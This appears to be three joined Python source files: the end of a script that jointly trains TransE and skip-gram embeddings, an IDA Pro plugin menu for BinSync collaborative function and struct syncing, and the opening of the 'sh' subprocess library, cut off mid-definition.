args=(log_queue, args)) listener_process.start() set_start_method('forkserver', force=True) # added for SG model # restrict no. 
of processes for TransE model to 8 vars(args)['num_proc_sg'] = args.num_proc if args.num_proc >=8: args.num_proc = 8 if args.num_proc_train == -1: args.num_proc_train = args.num_proc_sg init_time_start = time.time() wiki_link_dict = json.load(open(args.wiki_link_file)) # mapping from wikidata entity IDs to wikipedia entity names dictionary = Dictionary.load(args.dictionary_file) # load dataset and samplers dataset = get_dataset(args.data_path, args.dataset, args.format, dictionary, wiki_link_dict, args.data_files) if args.neg_sample_size_eval < 0: args.neg_sample_size_eval = dataset.n_entities args.batch_size = get_compatible_batch_size(args.batch_size, args.neg_sample_size) args.batch_size_eval = get_compatible_batch_size(args.batch_size_eval, args.neg_sample_size_eval) # We should turn on mix CPU-GPU training for multi-GPU training. if len(args.gpu) > 1: args.mix_cpu_gpu = True if args.num_proc < len(args.gpu): args.num_proc = len(args.gpu) # We need to ensure that the number of processes should match the number of GPUs. if len(args.gpu) > 1 and args.num_proc > 1: assert args.num_proc % len(args.gpu) == 0, \ 'The number of processes needs to be divisible by the number of GPUs' # For multiprocessing training, we need to ensure that training processes are synchronized periodically. if args.num_proc > 1: args.force_sync_interval = 1000 args.eval_filter = not args.no_eval_filter if args.neg_deg_sample_eval: assert not args.eval_filter, "if negative sampling based on degree, we can't filter positive edges." args.soft_rel_part = args.mix_cpu_gpu and args.rel_part train_data = TrainDataset(dataset, args, ranks=args.num_proc) print('no. of nodes = {}'.format(train_data.g.number_of_nodes())) print('no. of edges = {}'.format(train_data.g.number_of_edges())) if args.num_proc > 1: train_samplers = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) train_sampler_head = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_sampler_tail = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_samplers.append(NewBidirectionalOneShotIterator(train_sampler_head, train_sampler_tail, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities)) else: # This is used for debug train_sampler_head = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_tail = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler = NewBidirectionalOneShotIterator(train_sampler_head, train_sampler_tail, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities) train_data_name_graph = TrainDatasetNameGraph(dataset, args, ranks=args.num_proc) print('no. of nodes (name graph) = {}'.format(train_data_name_graph.g.number_of_nodes())) print('no. 
of edges (name graph) = {}'.format(train_data_name_graph.g.number_of_edges())) if args.num_proc > 1: train_samplers_name_graph = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) train_sampler_head_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_sampler_tail_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_samplers_name_graph.append(NewBidirectionalOneShotIterator(train_sampler_head_name_graph, train_sampler_tail_name_graph, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities)) else: # This is used for debug train_sampler_head_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_tail_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_name_graph = NewBidirectionalOneShotIterator(train_sampler_head_name_graph, train_sampler_tail_name_graph, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities) # if there is no cross partition relaiton, we fall back to strict_rel_part args.strict_rel_part = args.mix_cpu_gpu and (train_data.cross_part == False) args.num_workers = 8 # fix num_worker to 8 if args.valid or args.test: if len(args.gpu) > 1: args.num_test_proc = args.num_proc if args.num_proc < len(args.gpu) else len(args.gpu) else: args.num_test_proc = args.num_proc if args.valid: assert dataset.valid is not None, 'validation set is not provided' if args.test: assert dataset.test is not None, 'test set is not provided' eval_dataset = EvalDataset(dataset, args) if args.valid: if args.num_proc > 1: valid_sampler_heads = [] valid_sampler_tails = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) valid_sampler_head = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=args.num_proc, rank=i, ranks=args.num_proc) valid_sampler_tail = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=args.num_proc, rank=i, ranks=args.num_proc) valid_sampler_heads.append(valid_sampler_head) valid_sampler_tails.append(valid_sampler_tail) else: # This is used for debug valid_sampler_head = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=args.num_proc, rank=0, ranks=1) valid_sampler_tail = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=args.num_proc, rank=0, ranks=1) if args.test: if args.num_test_proc > 1: test_sampler_tails = [] test_sampler_heads = [] for i in range(args.num_test_proc): test_sampler_head = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=1, rank=i, ranks=args.num_test_proc) test_sampler_tail = 
eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=1, rank=i, ranks=args.num_test_proc) test_sampler_heads.append(test_sampler_head) test_sampler_tails.append(test_sampler_tail) else: test_sampler_head = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=1, rank=0, ranks=1) test_sampler_tail = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=1, rank=0, ranks=1) # load model model = load_model(logger, args, dataset.n_entities, dataset.n_relations) # KE model # load transE ckpt if args.transe_entity_ckpt_path: model.entity_emb.emb = torch.Tensor(np.load(args.transe_entity_ckpt_path)) if args.transe_relation_ckpt_path: model.relation_emb.emb = torch.Tensor(np.load(args.transe_relation_ckpt_path)) sg_model = skipGramModel(dictionary.word_size+dictionary.entity_size, args.hidden_dim, args.window, args.negative) if args.cuda: sg_model = sg_model.cuda() sg_model.share_memory() # load skip-gram ckpt if args.sg_ckpt_emb0_path: sg_model.emb0_lookup.weight.data.copy_(torch.Tensor(np.load(args.sg_ckpt_emb0_path))) if args.sg_ckpt_emb1_path: sg_model.emb1_lookup.weight.data.copy_(torch.Tensor(np.load(args.sg_ckpt_emb1_path))) if args.proj_layer_ckpt_path: model.proj_layer.load_state_dict(torch.load(args.proj_layer_ckpt_path)) sg_reg_optimizer_list = [] for i in range(args.num_proc): if args.sg_reg_optimizer == 'sgd': sg_reg_optimizer_list.append(optim.SGD(sg_model.parameters(), lr=args.sg_lr * (1 - word_count_actual.value / (args.n_iters * word_count)))) else: sg_reg_optimizer_list.append(optim.SparseAdam(sg_model.parameters())) # proj_layer = nn.Linear(model.entity_dim, model.entity_dim) proj_layer_optimizer_list = [] for i in range(args.num_proc): proj_layer_optimizer_list.append(optim.Adam(model.proj_layer.parameters())) if args.num_proc > 1 or args.async_update: model.share_memory() model.proj_layer.share_memory() # print('entity2id = {}'.format(dataset.entity2id)) # print('relation2id = {}'.format(dataset.relation2id)) id2entity_map = {val:key for key,val in dataset.entity2id.items()} print('wikipedia word vocab size = {}'.format(dictionary.word_size)) print('wikipedia entity vocab size = {}'.format(dictionary.entity_size)) print('wikidata entity vocab size = {}'.format(dataset.n_entities)) # We need to free all memory referenced by dataset. 
# eval_dataset = None # dataset = None print('Total initialize time {:.3f} seconds'.format(time.time() - init_time_start)) # train start = time.time() rel_parts = train_data.rel_parts if args.strict_rel_part or args.soft_rel_part else None cross_rels = train_data.cross_rels if args.soft_rel_part else None max_step_per_epoch = int(train_data.g.number_of_edges()/ (args.batch_size * args.num_proc))+1 vars(args)['max_step_per_epoch'] = max_step_per_epoch print('max_step_per_epoch = {}'.format(max_step_per_epoch)) max_step_per_epoch_name_graph = int(train_data_name_graph.g.number_of_edges()/ (args.batch_size * args.num_proc))+1 vars(args)['max_step_per_epoch_name_graph'] = max_step_per_epoch_name_graph print('max_step_per_epoch_name_graph = {}'.format(max_step_per_epoch_name_graph)) # TODO: change iter_id ctx = torch.multiprocessing.get_context(args.kb_process_method) # ctx = torch.multiprocessing.get_context('forkserver') # ctx = torch.multiprocessing.get_context('spawn') print('flag 6') os.environ['TMPDIR'] = args.save_path torch.manual_seed(args.seed) np.random.seed(args.seed) random.seed(args.seed) dgl.random.seed(args.seed) common_node_ids_dict_idx = list(filter(lambda x:x[1]!=-1, map(lambda x:(x[0], dictionary.get_entity_index(x[1])), filter(lambda x: x[1], map(lambda x:(x[0], wiki_link_dict.get(x[1], None)), list(id2entity_map.items())))))) # print(list(common_node_ids_dict_idx)) common_node_ids = [x[0] for x in common_node_ids_dict_idx] # common_node_ids_tensor = torch.tensor(common_node_ids) # TODO: convert the common node ids to corresponding wiki versions common_node_ids_wiki_version = [dataset.entity2id[dataset.id2entity_map[x] + '-wiki'] for x in common_node_ids] common_node_ids_wiki_version_tensor = torch.tensor(common_node_ids_wiki_version) # print('common_node_ids_wiki_version_tensor = {}'.format(common_node_ids_wiki_version_tensor)) common_entity_sg_idx = torch.tensor([x[1] for x in common_node_ids_dict_idx]) # print([dictionary.get_entity_by_index(x).title for x in common_entity_sg_idx]) # print([dataset.id2entity_map[x] for x in common_node_ids_wiki_version]) for iter_id in range(args.start_epoch, args.n_iters): epoch_start_time = time.time() sg_model.cpu() log_queue.put('Epoch {} of TransE model'.format(iter_id)) #*********************************** # train 1 epoch of TransE model #*********************************** if args.num_proc > 1: procs = [] barrier = ctx.Barrier(args.num_proc) for i in range(args.num_proc): valid_sampler = [valid_sampler_heads[i], valid_sampler_tails[i]] if args.valid else None # proc = mp.Process(target=train_process, args=(p_id, dump_db, dictionary, tokenizer, word_list, word_count_actual, freq, args, model)) proc = ctx.Process(target=train_mp_ke, args=(args, iter_id, False, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[i], proj_layer_optimizer_list[i], id2entity_map, wiki_link_dict, train_samplers[i], valid_sampler, i, rel_parts, cross_rels, barrier)) procs.append(proc) proc.start() print('TransE proc {} started'.format(i)) for i,proc in enumerate(procs): proc.join() print('TransE proc {} joined'.format(i)) # print(model.proj_layer.bias) else: valid_samplers = [valid_sampler_head, valid_sampler_tail] train_ke(args, iter_id, False, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[0], proj_layer_optimizer_list[0], id2entity_map, wiki_link_dict, train_sampler, valid_samplers, 0, rel_parts, cross_rels) if args.num_proc > 1: procs = [] 
barrier = ctx.Barrier(args.num_proc) for i in range(args.num_proc): valid_sampler = None # proc = mp.Process(target=train_process, args=(p_id, dump_db, dictionary, tokenizer, word_list, word_count_actual, freq, args, model)) proc = ctx.Process(target=train_mp_ke, args=(args, iter_id, True, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[i], proj_layer_optimizer_list[i], id2entity_map, wiki_link_dict, train_samplers_name_graph[i], valid_sampler, i, rel_parts, cross_rels, barrier)) procs.append(proc) proc.start() print('TransE proc {} started'.format(i)) for i,proc in enumerate(procs): proc.join() print('TransE proc {} joined'.format(i)) # print(model.proj_layer.bias) else: valid_samplers = None train_ke(args, iter_id, True, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[0], proj_layer_optimizer_list[0], id2entity_map, wiki_link_dict, train_sampler_name_graph, valid_samplers, 0, rel_parts, cross_rels) print('Iteration {} of TransE model completed in {} sec.'.format(iter_id, time.time()-epoch_start_time)) model.entity_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_entity') model.relation_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_relation') # print(model.proj_layer.bias) # print(model.proj_layer.state_dict()['bias']) torch.save(model.proj_layer.state_dict(), os.path.join(args.save_path, 'proj_layer'+'.pt')) # TODO: copy embeddings from transE to skip-gram sg_model.emb0_lookup.weight.data[common_entity_sg_idx] = model.entity_emb.emb[common_node_ids_wiki_version_tensor] # save skip-gram pytorch model weights to disk for use by wikipedia2vec API # sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') # save intermediate emb0 embedding sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) # sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') # save intermediate emb1 embedding sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) epoch_start_time = time.time() log_queue.put('Epoch {} of skip-gram model'.format(iter_id)) #*********************************** # train 1 epoch of SG model #*********************************** subprocess.run(['wikinew', 'train-embedding', args.dump_db_file, args.dictionary_file, sg_emb0_fname, sg_emb1_fname, str(args.n_iters), str(iter_id), os.path.join(args.save_path, 'emb_file'), '--pool-size', str(args.num_proc_train), '--dim-size', str(args.hidden_dim), '--mention-db', args.mention_db_file, '--link-graph', args.link_graph_file]) print('Iteration {} of skip-gram model completed in {} sec.'.format(iter_id, time.time()-epoch_start_time)) # torch.cuda.synchronize() # copy skip-gram model weights from 'model_file' to PyTorch model emb_combined = joblib.load(os.path.join(args.save_path, 'emb_file')) sg_model.emb0_lookup.weight.data.copy_(torch.tensor(emb_combined['syn0'])) sg_model.emb1_lookup.weight.data.copy_(torch.tensor(emb_combined['syn1'])) # sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') sg_emb0_iter_fname = os.path.join(args.save_path, 
args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) # sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') sg_emb1_iter_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) # TODO: copy embeddings from skip-gram to TransE model.entity_emb.emb[common_node_ids_wiki_version_tensor] = sg_model.emb0_lookup.weight.data[common_entity_sg_idx] print('training takes {} seconds'.format(time.time() - start)) model.entity_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_entity') model.relation_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_relation') sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) log_queue.put("kill") listener_process.join() if __name__ == '__main__': main()
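# --------------------------------------------------------------------------
# Illustrative sketch (not part of the original train.py): the core trick in
# the training loop above is that the KG model and the skip-gram model share
# entity embeddings for entities present in both vocabularies, and the shared
# rows are copied between the two embedding tables before and after each
# model's epoch (see the assignments using common_node_ids_wiki_version_tensor
# and common_entity_sg_idx). The function and index names below are
# hypothetical stand-ins for those tensors, shown under that assumption.
import torch

def swap_shared_rows(kg_emb: torch.Tensor, sg_emb: torch.Tensor,
                     kg_idx: torch.Tensor, sg_idx: torch.Tensor,
                     direction: str = "kg_to_sg") -> None:
    """Copy the rows of the shared entities from one embedding table to the other."""
    if direction == "kg_to_sg":
        # seed the skip-gram table with the freshly trained KG rows
        sg_emb[sg_idx] = kg_emb[kg_idx]
    else:
        # write the skip-gram rows back into the KG table
        kg_emb[kg_idx] = sg_emb[sg_idx]

def _swap_shared_rows_demo():
    # tiny usage example with random tables (dimensions are arbitrary)
    kg = torch.randn(10, 4)
    sg = torch.randn(20, 4)
    kg_idx = torch.tensor([0, 3, 7])
    sg_idx = torch.tensor([2, 5, 9])
    swap_shared_rows(kg, sg, kg_idx, sg_idx, "kg_to_sg")
    assert torch.equal(sg[sg_idx], kg[kg_idx])
# --------------------------------------------------------------------------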
sync_menu.py
from PyQt5.QtWidgets import QDialog, QVBoxLayout, QLineEdit, QHBoxLayout, QLabel, QPushButton, QGroupBox, \ QMessageBox, QCheckBox, QWidget, QFileDialog, QApplication, QComboBox, QTableWidget, QTableWidgetItem, \ QDialogButtonBox, QGridLayout, QHeaderView, QTableView, QAbstractItemView import sip import threading import idaapi import idautils import binsync.data from .. import compat from ..controller import BinsyncController from ..controller import UpdateTask # # MenuDialog Box for Binsync Actions # class BinsyncMenuActionItem: SYNC_SELECTED_FUNCTIONS = "Sync Selected Functions" SYNC_ALL_FUNCTIONS = "Sync All Functions" SYNC_STRUCTS = "Sync All Structs" TOGGLE_AUTO_SYNC = "Toggle Auto-Sync" class MenuDialog(QDialog): def __init__(self, controller, selected_functions, parent=None): super(MenuDialog, self).__init__(parent) self.controller = controller self.selected_functions = selected_functions self.select_table_widget = None self.all_table_widget = None self.active_table = None self._init_widget() def _init_widget(self): label = QLabel("Binsync Action") self.combo = QComboBox() self.combo.addItems([BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS, BinsyncMenuActionItem.SYNC_ALL_FUNCTIONS, BinsyncMenuActionItem.SYNC_STRUCTS, BinsyncMenuActionItem.TOGGLE_AUTO_SYNC]) self.combo.currentTextChanged.connect(self._on_combo_change) # build two versions of the table # TODO: eventually remove this. Its a hack to show all the users # in the case that we want to pull structs directly self.select_table_widget = self._build_table_widget( self._build_menu_table_for_selected_funcs(self.selected_functions) ) self.all_table_widget = self._build_table_widget( self._build_menu_table_for_all_users() ) # hide one of the tables, make the other active self.all_table_widget.hide() self.active_table = self.select_table_widget box = QDialogButtonBox( QDialogButtonBox.Ok | QDialogButtonBox.Cancel, centerButtons=True, ) box.accepted.connect(self.accept) box.rejected.connect(self.reject) lay = QGridLayout(self) lay.addWidget(label, 0, 0) lay.addWidget(self.combo, 0, 1) lay.addWidget(self.select_table_widget, 1, 0, 1, 2) lay.addWidget(self.all_table_widget, 1, 0, 1, 2) lay.addWidget(box, 2, 0, 1, 2) self.resize(640, 240) # # Table Builders # def _build_table_widget(self, menu_table): table_widget = QTableWidget(len(menu_table), 4) table_widget.setHorizontalHeaderLabels( "User;Last Push;Func Addr;Remote Name".split(";") ) header = table_widget.horizontalHeader() header.setSectionResizeMode(0, QHeaderView.ResizeToContents) header.setSectionResizeMode(1, QHeaderView.Stretch) header.setSectionResizeMode(2, QHeaderView.Stretch) for item, row in zip(menu_table, range(len(menu_table))): user_item = QTableWidgetItem(item[0]) push_item = QTableWidgetItem(item[1]) func_item = QTableWidgetItem(item[2]) func_name_item = QTableWidgetItem(item[3]) table_widget.setItem(row, 0, user_item) table_widget.setItem(row, 1, push_item) table_widget.setItem(row, 2, func_item) table_widget.setItem(row, 3, func_name_item) # set more table properties table_widget.setSelectionBehavior(QAbstractItemView.SelectRows) table_widget.setSelectionMode(QAbstractItemView.SingleSelection) table_widget.setEditTriggers(QAbstractItemView.NoEditTriggers) table_widget.doubleClicked.connect(self._on_click) return table_widget def _on_click(self, index): self.active_table.selectRow(index.row()) self.accept() def _build_menu_table_for_all_users(self): if self.controller.client.has_remote: self.controller.client.init_remote() menu_table = list() for user in 
self.controller.users(): state = self.controller.client.get_state(user=user.name) artifact, push_time = state.get_last_push_for_artifact_type(binsync.ArtifactGroupType.FUNCTION) if artifact is None or push_time == -1: row = [user.name, push_time, "", ""] else: local_name = compat.get_func_name(artifact) func = hex(artifact) row = [user.name, push_time, func, local_name] menu_table.append(row) menu_table.sort(key=lambda r: r[1], reverse=True) for row in menu_table: if row[1] == -1: time_ago = "" else: time_ago = BinsyncController.friendly_datetime(row[1]) row[1] = time_ago return menu_table def _build_menu_table_for_selected_funcs(self, selected_funcs): if self.controller.client.has_remote: self.controller.client.init_remote() # Build out the menu dictionary for the table menu_table = list() # [username, push_time, func_addr, local_name] for user in self.controller.users(): state = self.controller.client.get_state(user=user.name) relevant_funcs = set(state.functions.keys()).intersection(selected_funcs) # only display users who worked on the selected functions if not relevant_funcs: continue latest_time, latest_func, remote_name = -1, -1, "" for func_addr in relevant_funcs: sync_func: binsync.data.Function = state.functions[func_addr] if sync_func.last_change > latest_time: latest_time, latest_func, remote_name = sync_func.last_change, sync_func.addr, sync_func.name if sync_func.name else "" if latest_time == -1: continue #local_name = compat.get_func_name(latest_func) func = hex(latest_func) row = [user.name, latest_time, func, remote_name] menu_table.append(row) # sort menu_table.sort(key=lambda r: r[1], reverse=True) # fix each time for row in menu_table: time_ago = BinsyncController.friendly_datetime(row[1]) row[1] = time_ago return menu_table # # Action Selection Box Callback # def _on_combo_change(self, value): self._hide_all_tables() if value == BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS or value == BinsyncMenuActionItem.TOGGLE_AUTO_SYNC: self.select_table_widget.show() self.active_table = self.select_table_widget else: self.all_table_widget.show() self.active_table = self.all_table_widget def _hide_all_tables(self): self.select_table_widget.hide() self.all_table_widget.hide() # # External API # def get_selected_action(self): # defaults to "Sync" action = self.combo.currentText() selected_rows = self.active_table.selectionModel().selectedRows() if len(selected_rows) == 0: return action, None selected_user = selected_rows[0].data() return action, selected_user # # IDA Context Menu Hook # class IDACtxEntry(idaapi.action_handler_t): """ A basic Context Menu class to utilize IDA's action handlers. """ def __init__(self, action_function): idaapi.action_handler_t.__init__(self) self.action_function = action_function def activate(self, ctx): """ Execute the embedded action_function when this context menu is invoked. """ self.action_function() return 1 def update(self, ctx): """ Ensure the context menu is always available in IDA. 
""" return idaapi.AST_ENABLE_ALWAYS # # Actions # class SyncMenu: def __init__(self, controller): self.controller: BinsyncController = controller self.ctx_menu = IDACtxEntry(self.open_sync_menu) def open_sync_menu(self): """ Opens sync menu and gives the optinal actions """ selected_functions = self._get_selected_funcs() # open a dialog to make sync actions dialog = MenuDialog(self.controller, selected_functions) result = dialog.exec_() # only parse the action if the user accepted the result if result != QDialog.Accepted: return # parse action action, user = dialog.get_selected_action() # for every selected function perform the action! for func_addr in selected_functions: ida_func = idaapi.get_func(func_addr) ret = self._do_action(action, user, ida_func) if not ret: return def _do_action(self, action, user, ida_func): if user is None: print(f"[BinSync]: Error! No user selected for syncing.") return False if action == BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS: cursor_at_func = compat.get_function_cursor_at() # if currently looking at a function, do a fill now if ida_func and cursor_at_func == ida_func.start_ea: self.controller.fill_function(ida_func.start_ea, user=user) # otherwise, do it later else: if ida_func and ida_func.start_ea: try: target_user_state = self.controller.client.get_state(user=user) target_func = target_user_state.get_function(ida_func.start_ea) remote_name = target_func.name if remote_name != "" and remote_name: compat.set_ida_func_name(ida_func.start_ea, remote_name) except Exception: pass update_task = UpdateTask( self.controller.fill_function, ida_func.start_ea, user=user ) print(f"[BinSync]: Caching sync for \'{user}\' on function {hex(ida_func.start_ea)}.") self.controller.update_states[ida_func.start_ea].add_update_task(update_task) elif action == BinsyncMenuActionItem.TOGGLE_AUTO_SYNC: update_task = UpdateTask( self.controller.fill_function, ida_func.start_ea, user=user ) print(f"[BinSync]: Toggling auto-sync for user \'{user}\' in function {hex(ida_func.start_ea)}.") self.controller.update_states[ida_func.start_ea].toggle_auto_sync_task(update_task) elif action == BinsyncMenuActionItem.SYNC_ALL_FUNCTIONS: threading.Thread(target=self.controller.sync_all, kwargs={"user": user}).start() #self.controller.sync_all(user=user) print(f"[BinSync]: All data has been synced from user: {user}.") elif action == BinsyncMenuActionItem.SYNC_STRUCTS: self.controller.fill_structs(user=user) print(f"[BinSync]: All structs have been synced from user: {user}") else: print(f"[BinSync]: Error parsing sync action!") return False return True def _get_selected_funcs(self): """ Return the list of function names selected in the Functions window. Warning: It's possible that we don't get the correct name for a function lookup. In that case, this function will fail. See: https://github.com/gaasedelen/prefix/blob/master/plugin/ida_prefix.py#L567 """ twidget = idaapi.find_widget("Functions window") widget = sip.wrapinstance(int(twidget), QWidget) if not widget: idaapi.warning("Unable to find 'Functions window'") return # # locate the table widget within the Functions window that actually holds # all the visible function metadata # table: QTableView = widget.findChild(QTableView) # # scrape the selected function names from the Functions window table # selected_funcs = [str(s.data()) for s in table.selectionModel().selectedRows()] selected_func_addrs = [idaapi.get_name_ea(idaapi.BADADDR, func_name) for func_name in selected_funcs] return selected_func_addrs
sh_it.py
""" http://amoffat.github.io/sh/ """ # =============================================================================== # Copyright (C) 2011-2020 by Andrew Moffat # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # =============================================================================== __version__ = "1.14.1" __project_url__ = "https://github.com/amoffat/sh" from collections import deque try: from collections.abc import Mapping except ImportError: from collections import Mapping from contextlib import contextmanager from functools import partial from io import UnsupportedOperation, open as fdopen from locale import getpreferredencoding from types import ModuleType, GeneratorType import ast import errno try: import fcntl except ModuleNotFoundError: pass import gc import getpass import glob as glob_module import inspect import logging import os import platform try: import pty except ModuleNotFoundError: pass try: import pwd except ModuleNotFoundError: pass import re import select import signal import stat import struct try: import sys except ModuleNotFoundError: pass try: import termios except ModuleNotFoundError: pass import threading import time import traceback try: import tty except ModuleNotFoundError: pass import warnings import weakref IS_PY3 = sys.version_info[0] == 3 MINOR_VER = sys.version_info[1] IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6 if IS_PY3: from io import StringIO ioStringIO = StringIO from io import BytesIO as cStringIO iocStringIO = cStringIO from queue import Queue, Empty # for some reason, python 3.1 removed the builtin "callable", wtf if not hasattr(__builtins__, "callable"): def callable(ob): return hasattr(ob, "__call__") else: from StringIO import StringIO from cStringIO import OutputType as cStringIO from io import StringIO as ioStringIO from io import BytesIO as iocStringIO from Queue import Queue, Empty try: from shlex import quote as shlex_quote # here from 3.3 onward except ImportError: from pipes import quote as shlex_quote # undocumented before 2.7 # PBS is unsupported, this error never runs on windows anyhow, so many earlier imports # if "windows" in platform.system().lower(): # pragma: no cover # raise ImportError("sh %s is currently only supported on linux and osx. \ # please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \ # support." 
% __version__) DEFAULT_ENCODING = getpreferredencoding() or "UTF-8" IS_MACOS = platform.system() in ("AIX", "Darwin") THIS_DIR = os.path.dirname(os.path.realpath(__file__)) SH_LOGGER_NAME = __name__ # normally i would hate this idea of using a global to signify whether we are # running tests, because it breaks the assumption that what is running in the # tests is what will run live, but we ONLY use this in a place that has no # serious side-effects that could change anything. as long as we do that, it # should be ok RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0"))) FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0"))) # a re-entrant lock for pushd. this way, multiple threads that happen to use # pushd will all see the current working directory for the duration of the # with-context PUSHD_LOCK = threading.RLock() if hasattr(inspect, "getfullargspec"): def get_num_args(fn): return len(inspect.getfullargspec(fn).args) else: def get_num_args(fn): return len(inspect.getargspec(fn).args) if IS_PY3: raw_input = input unicode = str basestring = str long = int _unicode_methods = set(dir(unicode())) HAS_POLL = hasattr(select, "poll") POLLER_EVENT_READ = 1 POLLER_EVENT_WRITE = 2 POLLER_EVENT_HUP = 4 POLLER_EVENT_ERROR = 8 # here we use an use a poller interface that transparently selects the most # capable poller (out of either select.select or select.poll). this was added # by zhangyafeikimi when he discovered that if the fds created internally by sh # numbered > 1024, select.select failed (a limitation of select.select). this # can happen if your script opens a lot of files if HAS_POLL and not FORCE_USE_SELECT: class 